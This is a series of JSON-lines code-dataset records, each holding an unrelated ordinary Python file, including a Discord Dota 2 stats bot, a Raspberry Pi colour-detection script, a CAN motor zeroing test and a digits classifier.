(Probably)\".format(len(images_links)))\n","sub_path":"old/4chan-dl-old.py","file_name":"4chan-dl-old.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"309591208","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n __main__.py\n -----------\n\n TxTraderClient module - Expose class API as CLI\n\n Copyright (c) 2017 Reliance Systems Inc. \n Licensed under the MIT license. See LICENSE for details.\n\n\"\"\"\n\nif __name__=='__main__':\n from txtrader_client.client import API\n import simplejson as json\n from sys import argv\n flags=[]\n while argv[1].startswith('-'):\n flags.append(argv[1])\n del(argv[1])\n server, command = argv[1:3]\n args = argv[3:]\n ret = API(server).cmd(command, args)\n if ret != None:\n if '-p' in flags:\n print(json.dumps(ret, sort_keys=True, indent=2, separators=(',', ': ')))\n else:\n print(json.dumps(ret))\n","sub_path":"txtrader_client/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"158236005","text":"def buildLowestNumber(min):\n str1 = str(min)\n for i in range(0, len(str1)):\n strObj = str1[0: i:] + str1[i + 1::]\n temp = int(strObj)\n if min>temp:\n min = temp\n print(min)\n\nT = int(input())\n\nfor i in range(0, T):\n x = int(input()) \n buildLowestNumber(x)","sub_path":"Unkown/DiscountInAShop.py","file_name":"DiscountInAShop.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"359443700","text":"import discord\nimport sys\nfrom bota.constant import MAX_COMMAND_WORD_LENGTH\nfrom bota.private_constant import DISCORD_TOKEN, DISCORD_CLIENT_ID, ADMIN_ID\nfrom bota.applications.top_games import get_top_games\nfrom bota.web_scrap.scrap import get_current_trend, get_counter_hero, get_good_against, get_reddit\nfrom bota.web_scrap.scrap import get_skill_build, get_item_build, get_profile, save_id\nfrom bota.web_scrap.twitch_process import get_dota2_top_stream\nfrom bota.log_process import save_command_logs, get_command_log_tail\nfrom discord.utils import find\nfrom bota import constant\n\nclient = discord.Client()\n\n# This weird spacing is to pretty text in discord\ncommands_list = {'!top_game' : 'Shows top 9 Live Games eg: `!top game`',\n '!counter HeroName': 'Shows Heroes which counter the given hero name eg: `!counter am`',\n '!good HeroName' : 'Opposite of !counter command. Good against. eg: `!good axe`',\n '!skill or !talent HeroName': 'Shows most popular & win rate talent/skill build eg:`!skill meepo`',\n '!item HeroName' : 'Shows current meta item build by Top Rank Players eg: `!item kotl`',\n '!profile steamID': 'Shows your profile stats given steamID eg: `!profile 116585378`',\n '!save Alias steamID': 'Saves your steamID under Alias name, and call by Alias name.\\n'\n ' \\\n First **--->** `!save midone 116585378` Then **--->** `!profile midone`',\n '!trend' : 'Shows current heroes trend eg: `!trend`',\n '!twitch' : 'Shows Top 8 Twitch stream eg: `!twitch`',\n '!reddit' : 'Gets a reddit post from **/r/DotA2**. Options: `new`, `controversial`, `top`, `rising`, `random`, `hot`:\\n'\n ' eg 1: `!reddit` : Gets a random post from /r/DotA2/\\n'\n ' eg 2: `!reddit hot` : Gets Top 3 hot post from /r/DotA2/\\n'\n ' eg 3: `!reddit new` : Gets Top 3 new post from /r/DotA2/\\n'\n }\n\n\ndata_source_collection = \"**DATA COLLECTION SOURCE**:\\n\" \\\n \"1. DotaBuff\\n\" \\\n \"2. Reddit\\n\" \\\n \"3. Twitch\\n\" \\\n \"4. Dota2 ProTracker\\n\" \\\n \"5. Dota2API\"\n\n\ndef get_help():\n help_string = []\n head = \"```css\\nBelow are the commands to use DOTA BOT: 😋```\"\n below_head = '```cs\\n\"UPDATE\": Add Notable players in \"!top game\"\\n\"NOTE\": Can use short Hero Names, \"!counter anti mage\" as \"!counter am\"```'\n head = head + below_head\n help_string.append(head)\n for key, value in commands_list.items():\n command = '**' + key + '**'\n command_help = value\n full = command + '\\t:\\t' + command_help\n help_string.append(full + '\\n')\n help_string = \"\\n\".join(help_string)\n return help_string\n\n\n@client.event # event decorator/wrapper\nasync def on_ready():\n await client.change_presence(activity=discord.Game(name=\"Dota2 | type '!help'\"))\n print(f\"Logged in as {client.user}\")\n\n\n@client.event\nasync def on_guild_join(guild):\n general = find(lambda x: x.name == 'general', guild.text_channels)\n if general and general.permissions_for(guild.me).send_messages:\n await general.send(f'Hello **{format(guild.name)}**✌✌!\\n'\n f'Type `!help` or `!command` to get list of commands to use.')\n\n@client.event\nasync def on_message(message):\n is_command_called = True\n command_called = \"\"\n message_string = message.content\n message_string = message_string.lower().strip()\n message_word_length = len(message_string.split())\n print(f\"{message.channel}: {message.author}: {message.author.name}: {message.content}\")\n\n if client.user == message.author:\n is_command_called = False\n # Ignore all message passed by the our bot\n pass\n\n elif message.author.bot:\n # Ignore if message is from another Bot\n is_command_called = False\n pass\n \n elif '!help' == message_string or '--help' == message_string or '!command' in message_string:\n command_called = \"!help\"\n help_string = get_help()\n await message.channel.send(help_string)\n\n elif ('!top_game' in message_string or '!top game' in message_string) and \\\n message_word_length < MAX_COMMAND_WORD_LENGTH:\n command_called = \"!top_game\"\n image_path = get_top_games()\n await message.channel.send(f\"Getting Top Live Spectacting Games, Source: Dota2API, Dota2ProTracker\")\n await message.channel.send('Top Games: ', file=discord.File(f'{image_path}'))\n\n elif '!profile' in message_string.split()[0]:\n command_called = \"!profile\"\n flag, id, mode, result = get_profile(message_string)\n if not flag:\n if mode == 1:\n await message.channel.send(f'Could not find any profile under: **{id}**')\n else:\n await message.channel.send(f'Could not find any Alias name : **{id}**')\n else:\n await message.channel.send(f\"____**{id}**____'s Profile:, Source: DotaBuff\")\n await message.channel.send(result)\n\n elif '!save' in message_string.split()[0]:\n command_called = \"!save\"\n user_name, id, flag, status = save_id(message_string)\n if flag:\n await message.channel.send(f'**{id}** saved under the alias: {user_name}')\n else:\n await message.channel.send(f'**Failed to save, reason: {status}')\n\n elif \"!trend\" in message_string and message_word_length < (MAX_COMMAND_WORD_LENGTH - 2):\n command_called = \"!trend\"\n image_path = get_current_trend()\n await message.channel.send(f\"Getting this week Heroes Trend, Source: DotaBuff\")\n await message.channel.send('Current Trend: ', file=discord.File(image_path))\n\n elif (\"!counter\" in message_string or \"!bad\" in message_string) and message_word_length < MAX_COMMAND_WORD_LENGTH:\n command_called = \"!counter\"\n found, hero_name, image_path = get_counter_hero(message_string)\n if not found:\n if hero_name != '':\n await message.channel.send(f\"Do you mean **{hero_name}**, Try again with correct name\")\n else:\n await message.channel.send(f\"Could not find hero, Please make sure the hero name is correct\")\n else:\n await message.channel.send(f'**{hero_name.upper()}** is bad against, Source: DotaBuff ', file=discord.File(image_path))\n\n elif \"!good\" in message_string and message_word_length < MAX_COMMAND_WORD_LENGTH:\n command_called = \"!good\"\n found, hero_name, image_path = get_good_against(message_string)\n if not found:\n if hero_name != '':\n await message.channel.send(f\"Do you mean **{hero_name}**, Try again with correct name\")\n else:\n await message.channel.send(f\"Could not find hero, Please make sure the hero name is correct\")\n else:\n await message.channel.send(f'**{hero_name.upper()}** is good against, Source: DotaBuff ', file=discord.File(image_path))\n\n elif (\"!skill\" in message_string or \"!talent\" in message_string) \\\n and message_word_length < MAX_COMMAND_WORD_LENGTH:\n command_called = \"!skill\"\n found, hero_name, image_path = await get_skill_build(message_string)\n if not found:\n if hero_name != '':\n await message.channel.send(f\"Do you mean **{hero_name}**, Try again with correct name\")\n else:\n await message.channel.send(f\"Could not find hero, Please make sure the hero name is correct\")\n else:\n await message.channel.send(f'**{hero_name.upper()}** most popular Skill/Talent build: , Source: DotaBuff', file=discord.File(image_path))\n\n elif \"!item\" in message_string and message_word_length < MAX_COMMAND_WORD_LENGTH:\n command_called = \"!item\"\n found, hero_name, image_path = get_item_build(message_string)\n if not found:\n if hero_name != '':\n await message.channel.send(f\"Do you mean **{hero_name}**, Try again with correct name\")\n else:\n await message.channel.send(f\"Could not find hero, Please make sure the hero name is correct\")\n else:\n await message.channel.send(f'**{hero_name.upper()}** recent Item build by **Top Rank Players**:, Source: DotaBuff', file=discord.File(image_path))\n\n elif \"!twitch\" in message_string and message_word_length < MAX_COMMAND_WORD_LENGTH:\n command_called = \"!twitch\"\n result = get_dota2_top_stream()\n await message.channel.send(f'Source: Twitch{result}')\n\n elif \"!reddit\" in message_string and message_word_length < MAX_COMMAND_WORD_LENGTH:\n result_list, mode = get_reddit(message_string)\n command_called = f\"!reddit {mode}\"\n await message.channel.send(f\"**REDDIT** SortBy: **{mode.upper()}**, Source: Reddit\")\n for result in result_list:\n await message.channel.send(f'{result}')\n\n # elif \"!data\" in message_string and message_word_length < MAX_COMMAND_WORD_LENGTH:\n # await message.channel.send(data_source_collection)\n\n # Admin privilege\n elif \"!get_user\" in message_string and str(message.author) == ADMIN_ID:\n command_called = \"!get_user\"\n await message.channel.send(f'Steam Users ID:', file=discord.File(constant.STEAM_USER_FILE_PATH))\n\n elif \"!tail\" in message_string and str(message.author) == ADMIN_ID:\n is_command_called = False\n n = 5\n try:\n n = int(message_string.split()[1])\n except Exception:\n pass\n tail_log = get_command_log_tail(n)\n await message.channel.send(tail_log)\n\n # Message user\n elif f\"{DISCORD_CLIENT_ID}\" in message_string:\n await message.channel.send(f\"Hello {message.author.name}\"\n f\" Please type `!help` or `!command` for more options\")\n\n else:\n is_command_called = False\n\n if is_command_called:\n save_command_logs(message, command_called)\n\n\nclient.run(DISCORD_TOKEN)\n","sub_path":"bota/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"353203766","text":"import sys\nfrom .base import DynamicField\nfrom rest_framework import serializers\n\nfor cls_name in (\n 'BooleanField',\n 'CharField',\n 'DateField',\n 'DateTimeField',\n 'DecimalField',\n 'DictField',\n 'EmailField',\n 'FilePathField',\n 'FloatField',\n 'HiddenField',\n 'IPAddressField',\n 'ImageField',\n 'IntegerField',\n 'JSONField',\n 'ListField',\n 'RegexField',\n 'SlugField',\n 'TimeField',\n 'URLField',\n 'UUIDField',\n):\n cls = getattr(serializers, cls_name, None)\n if not cls:\n continue\n\n new_name = 'Dynamic%s' % cls_name\n new_cls = type(\n new_name,\n (DynamicField, cls),\n {}\n )\n setattr(sys.modules[__name__], new_name, new_cls)\n\n\nclass DynamicMethodField(\n serializers.SerializerMethodField,\n DynamicField\n):\n pass\n","sub_path":"dynamic_rest/fields/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"65828988","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Yuvv'\n\nimport functools\nfrom predictor.models import Rule, Knowledge\n\n\ndef valid_rule_filter_fixed(rule, knowledge):\n rule.cf_e = 0\n if rule.relationship == '&':\n for rkf in rule.related_knowledge_factor.all():\n if rkf.mark.mark not in knowledge:\n return False\n else:\n for rkw in rule.related_knowledge_weight.all():\n if rkf.mark.mark == rkw.mark.mark:\n rule.cf_e += rkf.factor * rkw.weight\n break\n elif rule.relationship == '|':\n flag = True\n for rkf in rule.related_knowledge_factor.all():\n if rkf.mark.mark in knowledge:\n rule.cf_e = max(map(lambda x: x.factor, rule.related_knowledge_factor.all()))\n flag = False\n break\n if flag:\n return False\n elif rule.relationship == '-':\n cdt = rule.related_knowledge_factor.all()[0]\n if cdt.mark.mark in knowledge:\n rule.cf_e = cdt.factor\n else:\n return False\n else:\n pass\n\n if rule.cf_e < rule.certainty_range:\n return False\n return True\n\n\ndef conflict_rule_filter(rules, knowledge):\n r_single = []\n r_or = []\n r_and = []\n for rule in rules:\n if rule.relationship == '&':\n r_and.append(rule)\n elif rule.relationship == '|':\n r_or.append(rule)\n elif rule.relationship == '-':\n r_single.append(rule)\n else:\n pass\n\n # single vs or\n i = 0\n while i < len(r_single):\n rs_mark = r_single[i].related_knowledge_factor.all()[0].mark.mark\n j = 0\n while j < len(r_or):\n ro_marks_on = filter(\n lambda mo: True if mo in knowledge else False,\n map(lambda rkf: rkf.mark.mark, r_or[j].related_knowledge_factor.all())\n )\n if rs_mark in ro_marks_on:\n if r_single[i].cf_e < r_or[j].cf_e:\n r_single.remove(r_single[i])\n i -= 1\n break\n else:\n r_or.remove(r_or[j])\n j -= 1\n j += 1\n i += 1\n # single vs and\n i = 0\n while i < len(r_single):\n rs_mark = r_single[i].related_knowledge_factor.all()[0].mark.mark\n j = 0\n while j < len(r_and):\n for ra_rkf in r_and[j].related_knowledge_factor.all():\n if ra_rkf.mark.mark == rs_mark:\n if r_single[i].cf_e < r_and[j].cf_e:\n r_single.remove(r_single[i])\n i -= 1\n break\n else:\n r_and.remove(r_and[j])\n j -= 1\n break\n j += 1\n i += 1\n # or vs and\n i = 0\n while i < len(r_or):\n ro_marks_on = filter(\n lambda mo: True if mo in knowledge else False,\n map(lambda rkf: rkf.mark.mark, r_or[i].related_knowledge_factor.all())\n )\n j = 0\n while j < len(r_and):\n for ra_mark in map(lambda y: y.mark.mark, r_and[j].related_knowledge_factor.all()):\n if ra_mark in ro_marks_on:\n if r_and[j].cf_e < r_or[i].cf_e:\n r_and.remove(r_and[j])\n j -= 1\n else:\n r_or.remove(r_or[i])\n i -= 1\n break\n j += 1\n i += 1\n\n r_and.extend(r_or)\n r_and.extend(r_single)\n return r_and\n\n\ndef rule_reduce(a, b):\n if a >= 0 and b >= 0:\n return a + b - a * b\n elif a <= 0 and b <= 0:\n return a + b + a * b\n else:\n return (a + b) / (1 - min(abs(a), abs(b)))\n\n\ndef collect_knowledge(temp, humi, visi, speed):\n knowledge = set()\n for k in Knowledge.objects.all():\n if k.category.name == 'temperature':\n if k.max_value >= temp >= k.min_value:\n knowledge.add(k.mark)\n elif k.category.name == 'humidity':\n if k.max_value >= humi >= k.min_value:\n knowledge.add(k.mark)\n elif k.category.name == 'visibility':\n if k.max_value >= visi >= k.min_value:\n knowledge.add(k.mark)\n elif k.category.name == 'wind speed':\n if k.max_value >= speed >= k.min_value:\n knowledge.add(k.mark)\n else:\n pass\n\n return knowledge\n\n\ndef infer_v2(target, temp=0, humi=0, visi=0, speed=0):\n target_mark = Knowledge.objects.get(detail=target)\n rules = Rule.objects.filter(expression__endswith=target_mark)\n knowledge = collect_knowledge(temp, humi, visi, speed)\n\n try:\n rules = filter(lambda x: valid_rule_filter_fixed(x, knowledge), rules)\n # rules = conflict_rule_filter(rules, knowledge)\n cf_hs = map(lambda rule: rule.certainty_factor * max(0, rule.cf_e), rules)\n result = functools.reduce(rule_reduce, cf_hs)\n except TypeError:\n result = 'cannot calculate!'\n pass\n\n return result\n","sub_path":"py-django/WeatherGetter/webview/predictor/utils/inferencev2.py","file_name":"inferencev2.py","file_ext":"py","file_size_in_byte":5173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"425138953","text":"import cv2\nimport numpy as np\nimport pandas as pd\nimport time\nimport RPi.GPIO as GPIO\nfrom pygame import mixer\n\n\nbtn_pin = 15\nmode = 1 # 1 for color and 0 for ph\nst_time = -1\nframeWidth = 640\nframeHeight = 480\ncap = cv2.VideoCapture(0)\ncap.set(3, frameWidth)\ncap.set(4, frameHeight)\nprev_result = \"nill\"\ncount = 0\n\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(btn_pin, GPIO.IN)\nmixer.init()\n\ndef getColorName(R,G,B):\n index=[\"color_name\",\"R\",\"G\",\"B\"]\n csv = pd.read_csv('colorsV4.csv', names=index, header=None,encoding='latin-1')\n minimum = 10000\n for i in range(len(csv)):\n d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"]))\n if(d<=minimum):\n minimum = d\n cname = csv.loc[i,\"color_name\"]\n return cname\n\ndef func_mode2():\n\n hsv_frame = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n # Red color\n low_red = np.array([0, 60, 105])\n high_red = np.array([13, 255, 205])\n red_mask = cv2.inRange(hsv_frame, low_red, high_red)\n #red = cv2.bitwise_and(img, img, mask=red_mask)\n Red = cv2.countNonZero(red_mask)\n\n # Blue color\n low_blue = np.array([94, 80, 2])\n high_blue = np.array([126, 255, 255])\n blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue)\n #blue = cv2.bitwise_and(img, img, mask=blue_mask)\n Blue = cv2.countNonZero(blue_mask)\n\n # Green color\n low_green = np.array([16, 40, 86])\n high_green = np.array([35, 180, 205])\n green_mask = cv2.inRange(hsv_frame, low_green, high_green)\n #green = cv2.bitwise_and(img, img, mask=green_mask)\n Ph = cv2.countNonZero(green_mask)\n\n print(Red,\" \",Blue,\" \",Ph,\" \",\" step output \")\n if(Red > Blue and Red > 50):\n print(\"red\")\n mixer.music.load('ColorFiles(hi)/' + \"RED\" +'.mp3')\n mixer.music.play()\n time.sleep(0.5)\n elif(Blue > Red and Blue> 50 ):\n print(\"blue\")\n mixer.music.load('ColorFiles(hi)/' + \"BLUE\" +'.mp3')\n mixer.music.play()\n time.sleep(0.5)\n elif(Ph > 50 ):\n print(\"ph paper\")\n mixer.music.load('ColorFiles(hi)/' + \"ph paper detected\" +'.mp3')\n mixer.music.play()\n time.sleep(1)\n else: \n print(\"..*******************\")\n mixer.music.load('ColorFiles(hi)/' + \"no ph paper detected\" +'.mp3')\n mixer.music.play()\n time.sleep(1)\n #cv2.rectangle(img, (60,50), (580,430), (0,255,0), 3)\n\n\ndef func_mode1():\n\n cv2.rectangle(img, (309,229), (329,249), (0,255,0), 1) #pixel range = x ==> 0-639 and y == 0 - 479\n roi = img[230:249, 310:329]\n avg1 = np.average(roi, axis=0)\n avg2 = np.average(avg1, axis=0)\n avg2_int = avg2.astype(int)\n avg2_int = avg2_int[::-1] #reversed for rgb \n # avg2_int_tup = tuple(avg2_int)\n r = avg2_int[0]\n g = avg2_int[1]\n b = avg2_int[2]\n\n new = getColorName(r,g,b)\n print(new)\n mixer.music.load('ColorFiles(hi)/' + new +'.mp3')\n mixer.music.play()\n time.sleep(0.5)\n\n\nwhile True:\n success, img = cap.read()\n time.sleep(0.1)\n if (GPIO.input(btn_pin) == False):\n time.sleep(0.01)\n if (GPIO.input(btn_pin) == False):\n time.sleep(0.2)\n if (GPIO.input(btn_pin) == True):\n count+=1\n if(st_time==-1):\n st_time = time.time()\n\n if(st_time!=-1):\n if(time.time()-st_time>1 and time.time()-st_time<1.5):\n print(count)\n if(count==1):\n print(mode)\n if(mode):\n func_mode1()\n else:\n func_mode2()\n\n else:\n mixer.music.load('ColorFiles(hi)/' + \"mode changed\" +'.mp3')\n mixer.music.play()\n time.sleep(0.5)\n mode = not mode\n if(mode):\n print(\"changed mode 1\")\n\n mixer.music.load('ColorFiles(hi)/' + \"color detection mode\" +'.mp3')\n mixer.music.play()\n time.sleep(0.8)\n #sound\n else:\n print(\"changed mode 2\")\n mixer.music.load('ColorFiles(hi)/' + \"ph paper color detection mode\" +'.mp3')\n mixer.music.play()\n time.sleep(1)\n #sound\n\n count=0\n st_time=-1;\n\n if(time.time()-st_time>1.5):\n count=0\n st_time=-1\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n\n img = cv2.flip(img,1)\n \n cv2.imshow('CAMERA',img)\n \ncap.release()\n\ncv2.destroyAllWindows()\n\n","sub_path":"COLOR PICKER/Python test codes/v3_contour/nocontour.py","file_name":"nocontour.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"542642008","text":"import random\nimport logging\n# KlibsTesting Param overrides\n#\n# Any param that is commented out by default is either deprecated or else not yet implemented--don't uncomment or use\n#\n#########################################\n# Logging Defaults\n#########################################\nlog_to_file = True\nlevel = logging.INFO\n\n#########################################\n# Display Settings\n#########################################\nadditional_displays = []\nscreen_origin = (0,0) # always (0,0) unless multiple displays in use\n#\n#########################################\n# Available Hardware\n#########################################\neye_tracker_available = False\neye_tracking = False\nlabjack_available = False\nlabjacking = False\n#\n#########################################\n# Environment Aesthetic Defaults\n#########################################\ndefault_fill_color = (45, 45, 45, 255)\ndefault_color = (255, 255, 255, 255)\ndefault_response_color = default_color\ndefault_input_color = default_color\ndefault_font_size = 28\ndefault_font_name = 'Frutiger'\ndefault_timeout_message = \"Too slow!\"\n#\n#########################################\n# EyeLink Sensitivities\n#########################################\nview_distance = 104 # in centimeters, 57m = in 1deg of visual angle per horizontal cm of screen\nsaccadic_velocity_threshold = 20\nsaccadic_acceleration_threshold = 5000\nsaccadic_motion_threshold = 0.15\n#\nfixation_size = 1, # deg of visual angle\nbox_size = 1, # deg of visual angle\ncue_size = 1, # deg of visual angle\ncue_back_size = 1, # deg of visual angle\n#\n#########################################\n# Experiment Structure\n#########################################\nmulti_session_project = False\ncollect_demographics = False\nmanual_demographics_collection = False\npracticing = False\ntrials_per_block = 24\nblocks_per_experiment = 1\ntrials_per_participant = 0\ntable_defaults = {}\n#\n#########################################\n# Development Mode Settings\n#########################################\ndm_suppress_debug_pane = False\ndm_auto_threshold = True\ndm_trial_show_mouse = True\ndm_ignore_local_overrides = False\n\n#\n#########################################\n# Data Export Settings\n#########################################\ndata_columns = None\ndefault_participant_fields = [[\"userhash\", \"participant\"], \"sex\", \"age\", \"handedness\"]\ndefault_participant_fields_sf = [[\"userhash\", \"participant\"], \"random_seed\", \"sex\", \"age\", \"handedness\"]\n\n#\n#########################################\n# Demographics Questions\n#########################################\n# Note: This list must supply all columns in the configured Participants table except:\n# \t- id\n# \t- participant id\n# \t- random_seed\n#\t- klibs_commit (if present)\n#\t- created\n# These columns must be present in the participants table (except klibs_commit) and are supplied automatically by klibs\ndemographic_questions = [\n\t['sex', \"What is your sex? \\nAnswer with: (m)ale,(f)emale\", ('m', 'M', 'f', 'F'), 'str', random.choice(['m', 'f'])],\n\t['handedness', \"Are right-handed, left-handed or ambidextrous? \\nAnswer with (r)ight, (l)eft or (a)mbidextrous.\",\n\t ('r', 'R', 'l', 'L', 'a', 'A'), 'str', 'r'],\n\t['age', 'What is your age?', None, 'int', -1]\n]\n\n#\n#########################################\n# PROJECT-SPECIFIC VARS\n#########################################\n","sub_path":"lib/klibs/template/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"520233557","text":"import sys\nimport time\nimport numpy as np\nfrom canmotorlib import CanMotorController\n\n\ndef setZeroPosition(motor, initPos):\n\n pos = initPos\n\n while abs(np.rad2deg(pos)) > 0.5:\n pos, vel, curr = motor.set_zero_position()\n print(\"Position: {}, Velocity: {}, Torque: {}\".format(np.rad2deg(pos), np.rad2deg(vel),\n curr))\n\n\n# Motor ID\nmotor_id_shoulder = 0x01\nmotor_id_elbow = 0x03\n\nif len(sys.argv) != 2:\n print('Provide CAN device name (can0, slcan0 etc.)')\n sys.exit(0)\n\nprint(\"Using Socket {} for can communucation\".format(sys.argv[1],))\n\nmotor_shoulder = CanMotorController(sys.argv[1], motor_id_shoulder)\nmotor_elbow = CanMotorController(sys.argv[1], motor_id_elbow)\n\nprint(\"Enabling Motors..\")\n\npos_shoulder, vel_shoulder, curr_shoulder = motor_shoulder.enable_motor()\n\nprint(\"Shoulder Motor Status: Pos: {}, Vel: {}, Torque: {}\".format(pos_shoulder, vel_shoulder,\n curr_shoulder))\n\npos_elbow, vel_elbow, curr_elbow = motor_elbow.enable_motor()\n\nprint(\"Elbow Motor Status: Pos: {}, Vel: {}, Torque: {}\".format(pos_elbow, vel_elbow, curr_elbow))\n\nprint(\"Setting Shoulder Motor to Zero Position...\")\n\nsetZeroPosition(motor_shoulder, pos_shoulder)\n\nprint(\"Setting Elbow Motor to Zero Position...\")\n\nsetZeroPosition(motor_elbow, pos_elbow)\n\n\n# # Rotation Test. Uncommnent to rotate the motors for almost 4 revolutions.\n# angularVelDeg = 720\n# sleepTime = 2\n\n# pos_shoulder, vel_shoulder, curr_shoulder = motor_1.send_deg_command(0, angularVelDeg, 0, 5, 0)\n# pos_elbow, vel_elbow, curr_elbow = motor_2.send_deg_command(0, angularVelDeg / 2, 0, 5, 0)\n\n# time.sleep(sleepTime)\n\n# pos_shoulder, vel_shoulder, curr_shoulder = motor_1.send_deg_command(0, 0, 0, 5, 0)\n# pos_elbow, vel_elbow, curr_elbow = motor_2.send_deg_command(0, 0, 0, 5, 0)\n\n# time.sleep(0.5)\n\n\nprint(\"Disabling Motors...\")\n\npos_shoulder, vel_shoulder, curr_shoulder = motor_elbow.disable_motor()\n\nprint(\"Shoulder Motor Status: Pos: {}, Vel: {}, Torque: {}\".format(pos_shoulder, vel_shoulder,\n curr_shoulder))\n\npos_elbow, vel_elbow, curr_elbow = motor_elbow.disable_motor()\n\nprint(\"Elbow Motor Status: Pos: {}, Vel: {}, Torque: {}\".format(pos_elbow, vel_elbow, curr_elbow))\n","sub_path":"two_motor_test.py","file_name":"two_motor_test.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"165604087","text":"# https://www.jiuzhang.com/solutions/validate-binary-search-tree\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def isValidBST(self, root: TreeNode) -> bool:\n\n # output = []\n # return self.dfs_v1(root, output)\n\n self.last_val = None\n self.is_bst = True\n self.dfs_v2(root)\n return self.is_bst\n\n def dfs_v2(self, root):\n # Same as v1 but use global variables\n # O(N), O(1)\n if not root:\n return\n\n self.dfs_v2(root.left)\n\n if self.last_val is not None and self.last_val >= root.val:\n self.is_bst = False\n return\n self.last_val = root.val\n\n self.dfs_v2(root.right)\n\n def dfs_v1(self, root, output):\n # Use inorder and record the numbers and make sure the last numbers is smaller than the current one\n # O(N), O(N)\n if not root:\n return True\n\n left = self.dfs_v1(root.left, output)\n\n if output and output[-1] >= root.val:\n return False\n output.append(root.val)\n\n right = self.dfs_v1(root.right, output)\n\n return left and right\n","sub_path":"leetcode/lc98_Validate_Binary_Search_Tree.py","file_name":"lc98_Validate_Binary_Search_Tree.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"578965363","text":"cat = '\\tI am tabbed in'\npersian_cat = 'I \\'am split \\non a line.'\nbacllash = 'I am \\\\a cat and not \\\\ a dog'\nfat_cat = '''\ni am on new line,\n\\thow are you doing.\n\\tIts feels good.\n'''\nprint(cat)\nprint(persian_cat)\nprint(bacllash)\nprint(fat_cat)\n\n# while True:\n# for i in [\"/\", \"-\", \"|\", \"\\\\\", \"|\"]:\n# print(\"s\\r\" % i)\n","sub_path":"ShaW/Part_1/ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"193707234","text":"# -*- coding: utf-8 -*-\n\nimport tensorflow as tf\nfrom matplotlib import pyplot as plt\n\n\n\nfrom sklearn.datasets import load_digits\nfrom matplotlib import pyplot as plt\n\ndigits = load_digits()\nprint(digits.data.shape)\n\nfig = plt.figure(figsize=(3, 3))\n#figsize w,h tuple in inches\n\nplt.imshow(digits['images'][66], cmap=\"gray\", interpolation='none')\n\n#plt.show()\nplt.savefig(\"lesson9-digits.png\")\n\n#=================\nfrom sklearn import svm\nclassifier = svm.SVC(gamma=0.001)\n#classifier.fit(digits.data, digits.target)\n#predicted = classifier.predict(digits.data)\n\nimport numpy as np\n# print(np.mean(digits.target == predicted))\n\nfrom sklearn.cross_validation import train_test_split\nX=digits.data\ny=digits.target\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\n\nprint(\"X_train: \" , X_train.shape)\nprint(\"y_train: \", y_train.shape)\nprint(\"X_test: \", X_test.shape)\nprint(\"y_test: \", y_test.shape)\n\nclassifier.fit(X_train, y_train)\npredicted = classifier.predict(X_test)\nprint(np.mean(y_test == predicted))\n\n\n#=========== \nfrom tensorflow.contrib import skflow\nn_classes = len(set(y_train))\nprint(n_classes)\n# classifier = skflow.TensorFlowLinearClassifier(n_classes=n_classes)\n# xxx classifier = skflow.TensorFlowDNNClassifier(n_classes=n_classes)\n # Build 3 layer DNN with 10, 20, 10 units respectively.\nclassifier = skflow.DNNClassifier(hidden_units=[20, 20, 10], n_classes=n_classes)\n# optimizer=tf.train.ProximalAdagradOptimizer(\n# learning_rate=0.1,\n# l1_regularization_strength=0.001\n# ))\nclassifier.fit(X_train, y_train,steps=1000) \n\ny_pred = classifier.predict(X_test)\n\nfrom sklearn import metrics\nprint(metrics.classification_report(y_true=y_test, y_pred=y_pred))\nprint(np.mean(y_test == y_pred))","sub_path":"lesson9.py","file_name":"lesson9.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"443358004","text":"# Copyright (c) 2016 Eayun, Inc.\n# All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\"\"\"\nModule to check L3 networking configurations.\n\"\"\"\n\nfrom netmon import checker\nfrom netmon.lib.neutron import 